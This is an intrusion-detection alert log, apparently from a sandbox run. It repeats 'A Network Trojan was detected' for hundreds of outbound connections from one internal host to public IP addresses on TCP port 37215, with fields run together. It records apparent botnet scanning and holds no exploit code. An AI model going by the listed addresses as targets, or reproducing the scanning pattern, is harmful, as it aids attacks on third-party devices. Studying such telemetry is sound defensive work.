      2025-02-12T16:57:20.145768+010028352221A Network Trojan was detected192.168.2.235359041.28.165.5437215TCP
      2025-02-12T16:57:20.145803+010028352221A Network Trojan was detected192.168.2.234823641.184.90.9737215TCP
      2025-02-12T16:57:20.146249+010028352221A Network Trojan was detected192.168.2.235817041.161.194.8537215TCP
      2025-02-12T16:57:20.146302+010028352221A Network Trojan was detected192.168.2.2360782157.6.128.1237215TCP
      2025-02-12T16:57:20.146366+010028352221A Network Trojan was detected192.168.2.235959841.88.117.7837215TCP
      2025-02-12T16:57:20.146509+010028352221A Network Trojan was detected192.168.2.2348548157.149.185.8637215TCP
      2025-02-12T16:57:20.146611+010028352221A Network Trojan was detected192.168.2.2351796220.227.26.18037215TCP
      2025-02-12T16:57:20.146794+010028352221A Network Trojan was detected192.168.2.2340480157.134.179.21937215TCP
      2025-02-12T16:57:20.146937+010028352221A Network Trojan was detected192.168.2.234362241.148.172.7537215TCP
      2025-02-12T16:57:20.146986+010028352221A Network Trojan was detected192.168.2.2355094164.198.74.3537215TCP
      2025-02-12T16:57:20.147144+010028352221A Network Trojan was detected192.168.2.234783841.220.251.21837215TCP
      2025-02-12T16:57:20.147160+010028352221A Network Trojan was detected192.168.2.235996641.72.63.21337215TCP
      2025-02-12T16:57:20.147289+010028352221A Network Trojan was detected192.168.2.2333656157.90.234.24437215TCP
      2025-02-12T16:57:20.147290+010028352221A Network Trojan was detected192.168.2.233356441.185.106.25437215TCP
      2025-02-12T16:57:20.147442+010028352221A Network Trojan was detected192.168.2.235106242.125.118.13637215TCP
      2025-02-12T16:57:20.147524+010028352221A Network Trojan was detected192.168.2.2353850143.71.206.24237215TCP
      2025-02-12T16:57:20.147652+010028352221A Network Trojan was detected192.168.2.2358228197.35.94.10937215TCP
      2025-02-12T16:57:20.147808+010028352221A Network Trojan was detected192.168.2.2335494142.45.24.13337215TCP
      2025-02-12T16:57:20.148233+010028352221A Network Trojan was detected192.168.2.2343826197.119.171.19937215TCP
      2025-02-12T16:57:20.148249+010028352221A Network Trojan was detected192.168.2.234338419.78.162.537215TCP
      2025-02-12T16:57:20.148258+010028352221A Network Trojan was detected192.168.2.236090641.128.25.19237215TCP
      2025-02-12T16:57:20.148315+010028352221A Network Trojan was detected192.168.2.2348418157.51.221.24737215TCP
      2025-02-12T16:57:20.148384+010028352221A Network Trojan was detected192.168.2.235724241.219.90.5537215TCP
      2025-02-12T16:57:20.148471+010028352221A Network Trojan was detected192.168.2.236030241.10.8.13337215TCP
      2025-02-12T16:57:20.148577+010028352221A Network Trojan was detected192.168.2.2359522197.193.183.1437215TCP
      2025-02-12T16:57:20.148648+010028352221A Network Trojan was detected192.168.2.235398041.232.165.5137215TCP
      2025-02-12T16:57:20.148795+010028352221A Network Trojan was detected192.168.2.2349326197.157.210.20737215TCP
      2025-02-12T16:57:20.149092+010028352221A Network Trojan was detected192.168.2.2358804157.118.125.24337215TCP
      2025-02-12T16:57:20.149295+010028352221A Network Trojan was detected192.168.2.2335270157.193.56.12137215TCP
      2025-02-12T16:57:20.149414+010028352221A Network Trojan was detected192.168.2.2354358157.165.210.5537215TCP
      2025-02-12T16:57:20.149588+010028352221A Network Trojan was detected192.168.2.2339922197.11.67.12937215TCP
      2025-02-12T16:57:20.149845+010028352221A Network Trojan was detected192.168.2.2354496197.94.22.537215TCP
      2025-02-12T16:57:20.149960+010028352221A Network Trojan was detected192.168.2.2338854203.134.152.2737215TCP
      2025-02-12T16:57:20.149986+010028352221A Network Trojan was detected192.168.2.2359650157.201.253.14437215TCP
      2025-02-12T16:57:20.150005+010028352221A Network Trojan was detected192.168.2.2340402155.75.111.18237215TCP
      2025-02-12T16:57:20.150089+010028352221A Network Trojan was detected192.168.2.233848041.217.213.11037215TCP
      2025-02-12T16:57:20.150329+010028352221A Network Trojan was detected192.168.2.2332846157.86.35.9037215TCP
      2025-02-12T16:57:20.150398+010028352221A Network Trojan was detected192.168.2.2356534157.37.22.21037215TCP
      2025-02-12T16:57:20.150711+010028352221A Network Trojan was detected192.168.2.234475641.135.123.1537215TCP
      2025-02-12T16:57:20.151166+010028352221A Network Trojan was detected192.168.2.2342712197.101.3.8237215TCP
      2025-02-12T16:57:20.151191+010028352221A Network Trojan was detected192.168.2.233632641.234.212.5537215TCP
      2025-02-12T16:57:20.151248+010028352221A Network Trojan was detected192.168.2.235717241.114.175.10937215TCP
      2025-02-12T16:57:20.151359+010028352221A Network Trojan was detected192.168.2.2337604157.120.56.22137215TCP
      2025-02-12T16:57:20.151513+010028352221A Network Trojan was detected192.168.2.233938080.120.167.7337215TCP
      2025-02-12T16:57:20.151513+010028352221A Network Trojan was detected192.168.2.2359442202.58.238.20137215TCP
      2025-02-12T16:57:20.151681+010028352221A Network Trojan was detected192.168.2.2345454197.111.111.20137215TCP
      2025-02-12T16:57:20.151812+010028352221A Network Trojan was detected192.168.2.2336540197.165.84.17637215TCP
      2025-02-12T16:57:20.151897+010028352221A Network Trojan was detected192.168.2.2346422208.188.25.18337215TCP
      2025-02-12T16:57:20.151943+010028352221A Network Trojan was detected192.168.2.2342562157.91.212.437215TCP
      2025-02-12T16:57:20.152098+010028352221A Network Trojan was detected192.168.2.2351132197.170.133.3837215TCP
      2025-02-12T16:57:20.152226+010028352221A Network Trojan was detected192.168.2.2358198157.132.199.22037215TCP
      2025-02-12T16:57:20.152384+010028352221A Network Trojan was detected192.168.2.2352732168.53.71.5237215TCP
      2025-02-12T16:57:20.152877+010028352221A Network Trojan was detected192.168.2.233340241.56.74.15937215TCP
      2025-02-12T16:57:20.156447+010028352221A Network Trojan was detected192.168.2.2352716197.1.126.7137215TCP
      2025-02-12T16:57:20.157436+010028352221A Network Trojan was detected192.168.2.233455241.174.224.6937215TCP
      2025-02-12T16:57:20.157702+010028352221A Network Trojan was detected192.168.2.233475860.72.138.13937215TCP
      2025-02-12T16:57:20.157702+010028352221A Network Trojan was detected192.168.2.234611441.97.138.11937215TCP
      2025-02-12T16:57:20.157739+010028352221A Network Trojan was detected192.168.2.2334336157.199.114.23837215TCP
      2025-02-12T16:57:20.157744+010028352221A Network Trojan was detected192.168.2.233789241.145.5.20637215TCP
      2025-02-12T16:57:20.157811+010028352221A Network Trojan was detected192.168.2.2340600197.86.248.20137215TCP
      2025-02-12T16:57:20.157934+010028352221A Network Trojan was detected192.168.2.2342428157.159.187.20037215TCP
      2025-02-12T16:57:20.158240+010028352221A Network Trojan was detected192.168.2.2333316179.95.38.4937215TCP
      2025-02-12T16:57:20.158697+010028352221A Network Trojan was detected192.168.2.2353392157.50.105.24737215TCP
      2025-02-12T16:57:20.158799+010028352221A Network Trojan was detected192.168.2.2334256157.164.116.5337215TCP
      2025-02-12T16:57:20.158848+010028352221A Network Trojan was detected192.168.2.2340356173.251.233.8037215TCP
      2025-02-12T16:57:20.159081+010028352221A Network Trojan was detected192.168.2.233618841.32.235.18437215TCP
      2025-02-12T16:57:20.159704+010028352221A Network Trojan was detected192.168.2.2336096197.92.181.10337215TCP
      2025-02-12T16:57:20.159746+010028352221A Network Trojan was detected192.168.2.2349196197.47.60.6837215TCP
      2025-02-12T16:57:20.159796+010028352221A Network Trojan was detected192.168.2.234010841.210.76.6237215TCP
      2025-02-12T16:57:20.159860+010028352221A Network Trojan was detected192.168.2.233524694.252.250.15337215TCP
      2025-02-12T16:57:20.159957+010028352221A Network Trojan was detected192.168.2.2334190201.51.99.17937215TCP
      2025-02-12T16:57:20.159963+010028352221A Network Trojan was detected192.168.2.2338232175.78.206.20237215TCP
      2025-02-12T16:57:20.160037+010028352221A Network Trojan was detected192.168.2.2334930133.227.109.3837215TCP
      2025-02-12T16:57:20.160046+010028352221A Network Trojan was detected192.168.2.2354714157.190.56.1537215TCP
      2025-02-12T16:57:20.160409+010028352221A Network Trojan was detected192.168.2.2356268157.18.35.20037215TCP
      2025-02-12T16:57:20.160777+010028352221A Network Trojan was detected192.168.2.2352686157.179.242.2237215TCP
      2025-02-12T16:57:20.161132+010028352221A Network Trojan was detected192.168.2.2343966119.125.161.16837215TCP
      2025-02-12T16:57:20.161192+010028352221A Network Trojan was detected192.168.2.235111641.149.251.2737215TCP
      2025-02-12T16:57:20.161229+010028352221A Network Trojan was detected192.168.2.235961852.152.250.3837215TCP
      2025-02-12T16:57:20.161327+010028352221A Network Trojan was detected192.168.2.2356012222.152.153.19837215TCP
      2025-02-12T16:57:20.161428+010028352221A Network Trojan was detected192.168.2.2338040106.95.246.14737215TCP
      2025-02-12T16:57:20.161438+010028352221A Network Trojan was detected192.168.2.2338078197.224.44.5137215TCP
      2025-02-12T16:57:20.161616+010028352221A Network Trojan was detected192.168.2.234691896.176.155.1637215TCP
      2025-02-12T16:57:20.161720+010028352221A Network Trojan was detected192.168.2.233534841.38.53.19837215TCP
      2025-02-12T16:57:20.161898+010028352221A Network Trojan was detected192.168.2.2357612131.126.166.21037215TCP
      2025-02-12T16:57:20.162428+010028352221A Network Trojan was detected192.168.2.2340274157.234.192.15137215TCP
      2025-02-12T16:57:20.162486+010028352221A Network Trojan was detected192.168.2.2334426157.198.226.21937215TCP
      2025-02-12T16:57:20.162564+010028352221A Network Trojan was detected192.168.2.233764841.120.59.537215TCP
      2025-02-12T16:57:20.163011+010028352221A Network Trojan was detected192.168.2.235871841.189.6.4937215TCP
      2025-02-12T16:57:20.163148+010028352221A Network Trojan was detected192.168.2.235352241.105.184.9737215TCP
      2025-02-12T16:57:20.163491+010028352221A Network Trojan was detected192.168.2.2355872128.34.60.13137215TCP
      2025-02-12T16:57:20.171136+010028352221A Network Trojan was detected192.168.2.235342041.227.147.13237215TCP
      2025-02-12T16:57:20.171714+010028352221A Network Trojan was detected192.168.2.233531041.8.52.2037215TCP
      2025-02-12T16:57:20.174896+010028352221A Network Trojan was detected192.168.2.2356768162.199.37.22737215TCP
      2025-02-12T16:57:20.175125+010028352221A Network Trojan was detected192.168.2.2351094157.143.12.4237215TCP
      2025-02-12T16:57:20.175127+010028352221A Network Trojan was detected192.168.2.2340024197.121.150.22837215TCP
      2025-02-12T16:57:20.175223+010028352221A Network Trojan was detected192.168.2.2352364197.244.239.13137215TCP
      2025-02-12T16:57:20.175702+010028352221A Network Trojan was detected192.168.2.233997241.31.109.15137215TCP
      2025-02-12T16:57:23.179347+010028352221A Network Trojan was detected192.168.2.2358946157.97.251.637215TCP
      2025-02-12T16:57:23.190541+010028352221A Network Trojan was detected192.168.2.2356868157.59.76.6237215TCP
      2025-02-12T16:57:23.190798+010028352221A Network Trojan was detected192.168.2.2347144197.105.185.23337215TCP
      2025-02-12T16:57:24.124361+010028352221A Network Trojan was detected192.168.2.2342876197.238.209.22937215TCP
      2025-02-12T16:57:24.139941+010028352221A Network Trojan was detected192.168.2.234479841.158.143.21037215TCP
      2025-02-12T16:57:24.140575+010028352221A Network Trojan was detected192.168.2.233369241.238.107.2637215TCP
      2025-02-12T16:57:24.155616+010028352221A Network Trojan was detected192.168.2.233417241.136.214.16137215TCP
      2025-02-12T16:57:24.156117+010028352221A Network Trojan was detected192.168.2.2338924197.3.217.8937215TCP
      2025-02-12T16:57:24.171064+010028352221A Network Trojan was detected192.168.2.2343248157.58.248.22337215TCP
      2025-02-12T16:57:24.174953+010028352221A Network Trojan was detected192.168.2.2358384157.204.167.12737215TCP
      2025-02-12T16:57:24.175073+010028352221A Network Trojan was detected192.168.2.2346208157.18.73.5537215TCP
      2025-02-12T16:57:24.186699+010028352221A Network Trojan was detected192.168.2.235175479.94.24.7737215TCP
      2025-02-12T16:57:24.190555+010028352221A Network Trojan was detected192.168.2.234619041.34.240.14337215TCP
      2025-02-12T16:57:24.190644+010028352221A Network Trojan was detected192.168.2.2343234197.237.242.22937215TCP
      2025-02-12T16:57:25.175357+010028352221A Network Trojan was detected192.168.2.2343244157.81.1.17837215TCP
      2025-02-12T16:57:25.175387+010028352221A Network Trojan was detected192.168.2.234562441.97.209.8037215TCP
      2025-02-12T16:57:25.189262+010028352221A Network Trojan was detected192.168.2.2335960157.2.171.1137215TCP
      2025-02-12T16:57:25.189331+010028352221A Network Trojan was detected192.168.2.2356474197.111.141.6837215TCP
      2025-02-12T16:57:25.190581+010028352221A Network Trojan was detected192.168.2.2337884157.249.209.5037215TCP
      2025-02-12T16:57:25.190700+010028352221A Network Trojan was detected192.168.2.2342010157.124.205.24437215TCP
      2025-02-12T16:57:25.192192+010028352221A Network Trojan was detected192.168.2.235963041.16.95.17537215TCP
      2025-02-12T16:57:25.192771+010028352221A Network Trojan was detected192.168.2.233467241.77.38.6337215TCP
      2025-02-12T16:57:25.194427+010028352221A Network Trojan was detected192.168.2.2348338157.26.94.14237215TCP
      2025-02-12T16:57:25.204429+010028352221A Network Trojan was detected192.168.2.2353040157.109.98.2737215TCP
      2025-02-12T16:57:25.204431+010028352221A Network Trojan was detected192.168.2.2359206197.228.22.11737215TCP
      2025-02-12T16:57:25.237775+010028352221A Network Trojan was detected192.168.2.233583841.4.207.3737215TCP
      2025-02-12T16:57:26.187121+010028352221A Network Trojan was detected192.168.2.2345126197.201.145.18237215TCP
      2025-02-12T16:57:26.187136+010028352221A Network Trojan was detected192.168.2.2341488157.101.42.1137215TCP
      2025-02-12T16:57:26.187136+010028352221A Network Trojan was detected192.168.2.2356430146.45.91.21837215TCP
      2025-02-12T16:57:26.187141+010028352221A Network Trojan was detected192.168.2.234659458.122.193.18037215TCP
      2025-02-12T16:57:26.187283+010028352221A Network Trojan was detected192.168.2.2352512197.254.32.8137215TCP
      2025-02-12T16:57:26.187403+010028352221A Network Trojan was detected192.168.2.235969441.30.133.15937215TCP
      2025-02-12T16:57:26.187405+010028352221A Network Trojan was detected192.168.2.2336214157.9.204.12037215TCP
      2025-02-12T16:57:26.187445+010028352221A Network Trojan was detected192.168.2.2332770197.188.159.18337215TCP
      2025-02-12T16:57:26.187456+010028352221A Network Trojan was detected192.168.2.234946889.28.214.7337215TCP
      2025-02-12T16:57:26.202597+010028352221A Network Trojan was detected192.168.2.234054441.155.21.13837215TCP
      2025-02-12T16:57:26.202620+010028352221A Network Trojan was detected192.168.2.234767441.113.57.8237215TCP
      2025-02-12T16:57:26.202818+010028352221A Network Trojan was detected192.168.2.2340732197.233.144.20437215TCP
      2025-02-12T16:57:26.203525+010028352221A Network Trojan was detected192.168.2.235129441.131.167.23937215TCP
      2025-02-12T16:57:26.204144+010028352221A Network Trojan was detected192.168.2.2353612157.1.41.1237215TCP
      2025-02-12T16:57:26.204386+010028352221A Network Trojan was detected192.168.2.2340228157.21.110.17237215TCP
      2025-02-12T16:57:26.204617+010028352221A Network Trojan was detected192.168.2.2347340103.85.252.4237215TCP
      2025-02-12T16:57:26.205779+010028352221A Network Trojan was detected192.168.2.2348516197.132.73.3637215TCP
      2025-02-12T16:57:26.206541+010028352221A Network Trojan was detected192.168.2.2339112197.239.101.23037215TCP
      2025-02-12T16:57:26.217895+010028352221A Network Trojan was detected192.168.2.234790248.104.208.23037215TCP
      2025-02-12T16:57:26.218115+010028352221A Network Trojan was detected192.168.2.2338358197.169.59.337215TCP
      2025-02-12T16:57:26.218711+010028352221A Network Trojan was detected192.168.2.2350780197.230.99.17537215TCP
      2025-02-12T16:57:26.218824+010028352221A Network Trojan was detected192.168.2.234873841.100.146.17237215TCP
      2025-02-12T16:57:26.218829+010028352221A Network Trojan was detected192.168.2.2342736197.200.97.11037215TCP
      2025-02-12T16:57:26.218966+010028352221A Network Trojan was detected192.168.2.234721441.210.243.6137215TCP
      2025-02-12T16:57:26.220485+010028352221A Network Trojan was detected192.168.2.2344074134.2.240.11737215TCP
      2025-02-12T16:57:26.220679+010028352221A Network Trojan was detected192.168.2.2353144157.118.43.3037215TCP
      2025-02-12T16:57:26.221895+010028352221A Network Trojan was detected192.168.2.234023441.67.128.3437215TCP
      2025-02-12T16:57:26.221910+010028352221A Network Trojan was detected192.168.2.2347564109.198.32.15737215TCP
      2025-02-12T16:57:26.222329+010028352221A Network Trojan was detected192.168.2.2346856157.114.71.5137215TCP
      2025-02-12T16:57:26.222343+010028352221A Network Trojan was detected192.168.2.2359734157.89.130.1837215TCP
      2025-02-12T16:57:26.222343+010028352221A Network Trojan was detected192.168.2.234127837.10.152.17237215TCP
      2025-02-12T16:57:26.222633+010028352221A Network Trojan was detected192.168.2.2336536157.121.43.16337215TCP
      2025-02-12T16:57:26.222638+010028352221A Network Trojan was detected192.168.2.234368841.10.236.13537215TCP
      2025-02-12T16:57:26.223008+010028352221A Network Trojan was detected192.168.2.234705641.133.167.21037215TCP
      2025-02-12T16:57:26.223008+010028352221A Network Trojan was detected192.168.2.2338730157.223.123.10437215TCP
      2025-02-12T16:57:26.223108+010028352221A Network Trojan was detected192.168.2.234289082.210.224.4737215TCP
      2025-02-12T16:57:26.223250+010028352221A Network Trojan was detected192.168.2.2352890194.49.134.4137215TCP
      2025-02-12T16:57:26.223257+010028352221A Network Trojan was detected192.168.2.234966441.130.123.3437215TCP
      2025-02-12T16:57:26.223264+010028352221A Network Trojan was detected192.168.2.2356768197.217.245.20237215TCP
      2025-02-12T16:57:26.223338+010028352221A Network Trojan was detected192.168.2.2335048197.198.98.18037215TCP
      2025-02-12T16:57:26.227489+010028352221A Network Trojan was detected192.168.2.2356924157.167.148.18137215TCP
      2025-02-12T16:57:26.233814+010028352221A Network Trojan was detected192.168.2.233373441.205.128.2437215TCP
      2025-02-12T16:57:26.233814+010028352221A Network Trojan was detected192.168.2.2333396121.134.165.17337215TCP
      2025-02-12T16:57:26.235362+010028352221A Network Trojan was detected192.168.2.2340308157.146.60.10837215TCP
      2025-02-12T16:57:26.235517+010028352221A Network Trojan was detected192.168.2.2352814197.150.252.14637215TCP
      2025-02-12T16:57:26.236774+010028352221A Network Trojan was detected192.168.2.2337040157.97.61.3037215TCP
      2025-02-12T16:57:26.237738+010028352221A Network Trojan was detected192.168.2.2349500197.240.124.2337215TCP
      2025-02-12T16:57:26.237738+010028352221A Network Trojan was detected192.168.2.2348184157.211.159.12237215TCP
      2025-02-12T16:57:26.237814+010028352221A Network Trojan was detected192.168.2.2347368197.200.115.12637215TCP
      2025-02-12T16:57:26.238467+010028352221A Network Trojan was detected192.168.2.2356470197.173.151.23737215TCP
      2025-02-12T16:57:26.238634+010028352221A Network Trojan was detected192.168.2.2347206197.200.235.23337215TCP
      2025-02-12T16:57:26.239108+010028352221A Network Trojan was detected192.168.2.2345666197.172.120.13537215TCP
      2025-02-12T16:57:27.204289+010028352221A Network Trojan was detected192.168.2.2352804157.113.51.21737215TCP
      2025-02-12T16:57:27.204339+010028352221A Network Trojan was detected192.168.2.2336824157.108.238.4637215TCP
      2025-02-12T16:57:27.204507+010028352221A Network Trojan was detected192.168.2.2353858197.207.252.2437215TCP
      2025-02-12T16:57:27.218007+010028352221A Network Trojan was detected192.168.2.234165241.175.156.3637215TCP
      2025-02-12T16:57:27.218086+010028352221A Network Trojan was detected192.168.2.235708241.173.123.15137215TCP
      2025-02-12T16:57:27.218157+010028352221A Network Trojan was detected192.168.2.2339582157.249.11.3137215TCP
      2025-02-12T16:57:27.218286+010028352221A Network Trojan was detected192.168.2.235731841.13.36.5637215TCP
      2025-02-12T16:57:27.218568+010028352221A Network Trojan was detected192.168.2.2358728197.74.147.2237215TCP
      2025-02-12T16:57:27.218688+010028352221A Network Trojan was detected192.168.2.2341712157.212.68.1537215TCP
      2025-02-12T16:57:27.218721+010028352221A Network Trojan was detected192.168.2.2346748197.35.174.10137215TCP
      2025-02-12T16:57:27.218852+010028352221A Network Trojan was detected192.168.2.2342240157.71.70.9337215TCP
      2025-02-12T16:57:27.218894+010028352221A Network Trojan was detected192.168.2.2336948157.135.215.24937215TCP
      2025-02-12T16:57:27.219570+010028352221A Network Trojan was detected192.168.2.2334896150.160.43.4337215TCP
      2025-02-12T16:57:27.219771+010028352221A Network Trojan was detected192.168.2.234914074.184.57.18237215TCP
      2025-02-12T16:57:27.219989+010028352221A Network Trojan was detected192.168.2.2340528197.165.141.13437215TCP
      2025-02-12T16:57:27.220035+010028352221A Network Trojan was detected192.168.2.2343398157.199.87.19737215TCP
      2025-02-12T16:57:27.220152+010028352221A Network Trojan was detected192.168.2.233933841.144.159.18137215TCP
      2025-02-12T16:57:27.220177+010028352221A Network Trojan was detected192.168.2.2355096206.8.170.7337215TCP
      2025-02-12T16:57:27.220243+010028352221A Network Trojan was detected192.168.2.235071074.75.42.12337215TCP
      2025-02-12T16:57:27.220393+010028352221A Network Trojan was detected192.168.2.2356934197.76.102.6637215TCP
      2025-02-12T16:57:27.220421+010028352221A Network Trojan was detected192.168.2.2351034157.119.37.20437215TCP
      2025-02-12T16:57:27.221012+010028352221A Network Trojan was detected192.168.2.2334730197.229.218.4637215TCP
      2025-02-12T16:57:27.233856+010028352221A Network Trojan was detected192.168.2.2337444162.135.92.5537215TCP
      2025-02-12T16:57:27.234057+010028352221A Network Trojan was detected192.168.2.2341836197.207.107.21937215TCP
      2025-02-12T16:57:27.234140+010028352221A Network Trojan was detected192.168.2.2336640197.19.52.19337215TCP
      2025-02-12T16:57:27.234272+010028352221A Network Trojan was detected192.168.2.2350922157.55.214.3637215TCP
      2025-02-12T16:57:27.234300+010028352221A Network Trojan was detected192.168.2.234744841.156.178.20037215TCP
      2025-02-12T16:57:27.234649+010028352221A Network Trojan was detected192.168.2.234051041.186.115.3337215TCP
      2025-02-12T16:57:27.234734+010028352221A Network Trojan was detected192.168.2.2355558217.152.91.15137215TCP
      2025-02-12T16:57:27.235311+010028352221A Network Trojan was detected192.168.2.2350122196.74.57.17137215TCP
      2025-02-12T16:57:27.235388+010028352221A Network Trojan was detected192.168.2.234258441.109.249.10737215TCP
      2025-02-12T16:57:27.235551+010028352221A Network Trojan was detected192.168.2.234491441.7.244.21737215TCP
      2025-02-12T16:57:27.235562+010028352221A Network Trojan was detected192.168.2.2350506197.191.38.15137215TCP
      2025-02-12T16:57:27.235626+010028352221A Network Trojan was detected192.168.2.2355162118.18.22.6937215TCP
      2025-02-12T16:57:27.235717+010028352221A Network Trojan was detected192.168.2.2358640157.205.47.10937215TCP
      2025-02-12T16:57:27.235749+010028352221A Network Trojan was detected192.168.2.2337390155.185.231.5837215TCP
      2025-02-12T16:57:27.235807+010028352221A Network Trojan was detected192.168.2.2360094197.57.176.20437215TCP
      2025-02-12T16:57:27.235891+010028352221A Network Trojan was detected192.168.2.233996041.131.177.2937215TCP
      2025-02-12T16:57:27.236222+010028352221A Network Trojan was detected192.168.2.233491041.177.70.15137215TCP
      2025-02-12T16:57:27.237347+010028352221A Network Trojan was detected192.168.2.2359152217.57.205.25237215TCP
      2025-02-12T16:57:27.237581+010028352221A Network Trojan was detected192.168.2.2332908157.60.56.14637215TCP
      2025-02-12T16:57:27.237629+010028352221A Network Trojan was detected192.168.2.2357728198.207.103.6637215TCP
      2025-02-12T16:57:27.237714+010028352221A Network Trojan was detected192.168.2.2333038197.183.209.637215TCP
      2025-02-12T16:57:27.237782+010028352221A Network Trojan was detected192.168.2.234400241.53.239.7637215TCP
      2025-02-12T16:57:27.237954+010028352221A Network Trojan was detected192.168.2.2347414197.201.37.17437215TCP
      2025-02-12T16:57:27.238015+010028352221A Network Trojan was detected192.168.2.234079241.160.229.237215TCP
      2025-02-12T16:57:27.238146+010028352221A Network Trojan was detected192.168.2.235289457.234.180.25537215TCP
      2025-02-12T16:57:27.238191+010028352221A Network Trojan was detected192.168.2.235879079.17.7.14837215TCP
      2025-02-12T16:57:27.238292+010028352221A Network Trojan was detected192.168.2.235936041.13.210.10837215TCP
      2025-02-12T16:57:27.238404+010028352221A Network Trojan was detected192.168.2.2333462142.158.156.8837215TCP
      2025-02-12T16:57:27.240007+010028352221A Network Trojan was detected192.168.2.234388441.60.76.7537215TCP
      2025-02-12T16:57:27.240094+010028352221A Network Trojan was detected192.168.2.234578241.30.49.15437215TCP
      2025-02-12T16:57:27.240271+010028352221A Network Trojan was detected192.168.2.2347520173.225.32.737215TCP
      2025-02-12T16:57:27.240346+010028352221A Network Trojan was detected192.168.2.2332910157.204.33.24237215TCP
      2025-02-12T16:57:27.240421+010028352221A Network Trojan was detected192.168.2.2334414157.120.97.20037215TCP
      2025-02-12T16:57:27.240461+010028352221A Network Trojan was detected192.168.2.23536142.21.32.8837215TCP
      2025-02-12T16:57:27.240509+010028352221A Network Trojan was detected192.168.2.2355870197.78.118.15737215TCP
      2025-02-12T16:57:27.240570+010028352221A Network Trojan was detected192.168.2.2352542197.20.66.17937215TCP
      2025-02-12T16:57:27.240631+010028352221A Network Trojan was detected192.168.2.235736641.70.65.13137215TCP
      2025-02-12T16:57:27.240834+010028352221A Network Trojan was detected192.168.2.235563080.37.224.9737215TCP
      2025-02-12T16:57:27.241648+010028352221A Network Trojan was detected192.168.2.2358622157.241.177.10837215TCP
      2025-02-12T16:57:27.241808+010028352221A Network Trojan was detected192.168.2.235878238.12.101.3537215TCP
      2025-02-12T16:57:27.241904+010028352221A Network Trojan was detected192.168.2.2333944157.165.116.5137215TCP
      2025-02-12T16:57:27.241978+010028352221A Network Trojan was detected192.168.2.233680641.219.235.2937215TCP
      2025-02-12T16:57:27.242045+010028352221A Network Trojan was detected192.168.2.2357786142.69.242.21837215TCP
      2025-02-12T16:57:27.242129+010028352221A Network Trojan was detected192.168.2.2354374157.42.97.9137215TCP
      2025-02-12T16:57:27.242250+010028352221A Network Trojan was detected192.168.2.2360728157.123.146.8637215TCP
      2025-02-12T16:57:27.252282+010028352221A Network Trojan was detected192.168.2.234853041.17.58.7937215TCP
      2025-02-12T16:57:27.253068+010028352221A Network Trojan was detected192.168.2.235349665.97.145.22937215TCP
      2025-02-12T16:57:27.253253+010028352221A Network Trojan was detected192.168.2.234934641.168.115.9437215TCP
      2025-02-12T16:57:27.253279+010028352221A Network Trojan was detected192.168.2.2336872157.100.130.3637215TCP
      2025-02-12T16:57:27.253340+010028352221A Network Trojan was detected192.168.2.2348236157.200.61.19437215TCP
      2025-02-12T16:57:27.265011+010028352221A Network Trojan was detected192.168.2.2358338197.37.65.19937215TCP
      2025-02-12T16:57:27.266435+010028352221A Network Trojan was detected192.168.2.233451041.224.221.20037215TCP
      2025-02-12T16:57:27.266830+010028352221A Network Trojan was detected192.168.2.2333156197.236.240.20137215TCP
      2025-02-12T16:57:27.267244+010028352221A Network Trojan was detected192.168.2.2352392190.82.141.3937215TCP
      2025-02-12T16:57:27.268619+010028352221A Network Trojan was detected192.168.2.2347980157.79.211.18837215TCP
      2025-02-12T16:57:27.268743+010028352221A Network Trojan was detected192.168.2.2340698197.32.108.6637215TCP
      2025-02-12T16:57:27.268891+010028352221A Network Trojan was detected192.168.2.234275647.251.214.12237215TCP
      2025-02-12T16:57:27.269423+010028352221A Network Trojan was detected192.168.2.2357828156.177.200.4737215TCP
      2025-02-12T16:57:27.270449+010028352221A Network Trojan was detected192.168.2.2341558197.151.146.9437215TCP
      2025-02-12T16:57:27.270538+010028352221A Network Trojan was detected192.168.2.2344526157.1.197.15137215TCP
      2025-02-12T16:57:27.270645+010028352221A Network Trojan was detected192.168.2.2338122157.119.42.2537215TCP
      2025-02-12T16:57:27.270864+010028352221A Network Trojan was detected192.168.2.2356168172.206.47.24237215TCP
      2025-02-12T16:57:28.280719+010028352221A Network Trojan was detected192.168.2.233684478.64.73.6737215TCP
      2025-02-12T16:57:28.284487+010028352221A Network Trojan was detected192.168.2.235039041.127.173.22237215TCP
      2025-02-12T16:57:29.265075+010028352221A Network Trojan was detected192.168.2.2349032157.222.240.18937215TCP
      2025-02-12T16:57:29.265079+010028352221A Network Trojan was detected192.168.2.2354472157.60.233.25437215TCP
      2025-02-12T16:57:29.265171+010028352221A Network Trojan was detected192.168.2.234400241.28.76.6337215TCP
      2025-02-12T16:57:29.265625+010028352221A Network Trojan was detected192.168.2.233444241.203.47.17237215TCP
      2025-02-12T16:57:29.265628+010028352221A Network Trojan was detected192.168.2.2358858157.225.176.5237215TCP
      2025-02-12T16:57:29.266801+010028352221A Network Trojan was detected192.168.2.2356412157.22.57.25237215TCP
      2025-02-12T16:57:29.266801+010028352221A Network Trojan was detected192.168.2.2357290157.106.56.2337215TCP
      2025-02-12T16:57:29.267377+010028352221A Network Trojan was detected192.168.2.2348712197.158.224.10937215TCP
      2025-02-12T16:57:29.281018+010028352221A Network Trojan was detected192.168.2.234184641.250.137.14037215TCP
      2025-02-12T16:57:29.284450+010028352221A Network Trojan was detected192.168.2.2346632197.186.8.7637215TCP
      2025-02-12T16:57:29.285252+010028352221A Network Trojan was detected192.168.2.233937841.77.97.13937215TCP
      2025-02-12T16:57:29.296330+010028352221A Network Trojan was detected192.168.2.234919049.215.198.18637215TCP
      2025-02-12T16:57:29.296439+010028352221A Network Trojan was detected192.168.2.235560641.134.53.5437215TCP
      2025-02-12T16:57:29.296444+010028352221A Network Trojan was detected192.168.2.2351238197.194.107.10737215TCP
      2025-02-12T16:57:29.299436+010028352221A Network Trojan was detected192.168.2.235684441.54.146.16237215TCP
      2025-02-12T16:57:29.300607+010028352221A Network Trojan was detected192.168.2.234944841.93.247.16037215TCP
      2025-02-12T16:57:29.300607+010028352221A Network Trojan was detected192.168.2.2358516157.235.243.10237215TCP
      2025-02-12T16:57:29.300607+010028352221A Network Trojan was detected192.168.2.2353944103.37.241.20937215TCP
      2025-02-12T16:57:29.300619+010028352221A Network Trojan was detected192.168.2.234861685.56.18.16337215TCP
      2025-02-12T16:57:29.303353+010028352221A Network Trojan was detected192.168.2.235656841.232.70.12837215TCP
      2025-02-12T16:57:29.311858+010028352221A Network Trojan was detected192.168.2.234561641.22.74.23537215TCP
      2025-02-12T16:57:29.311922+010028352221A Network Trojan was detected192.168.2.235870241.195.85.19337215TCP
      2025-02-12T16:57:29.312072+010028352221A Network Trojan was detected192.168.2.2334404157.158.165.6937215TCP
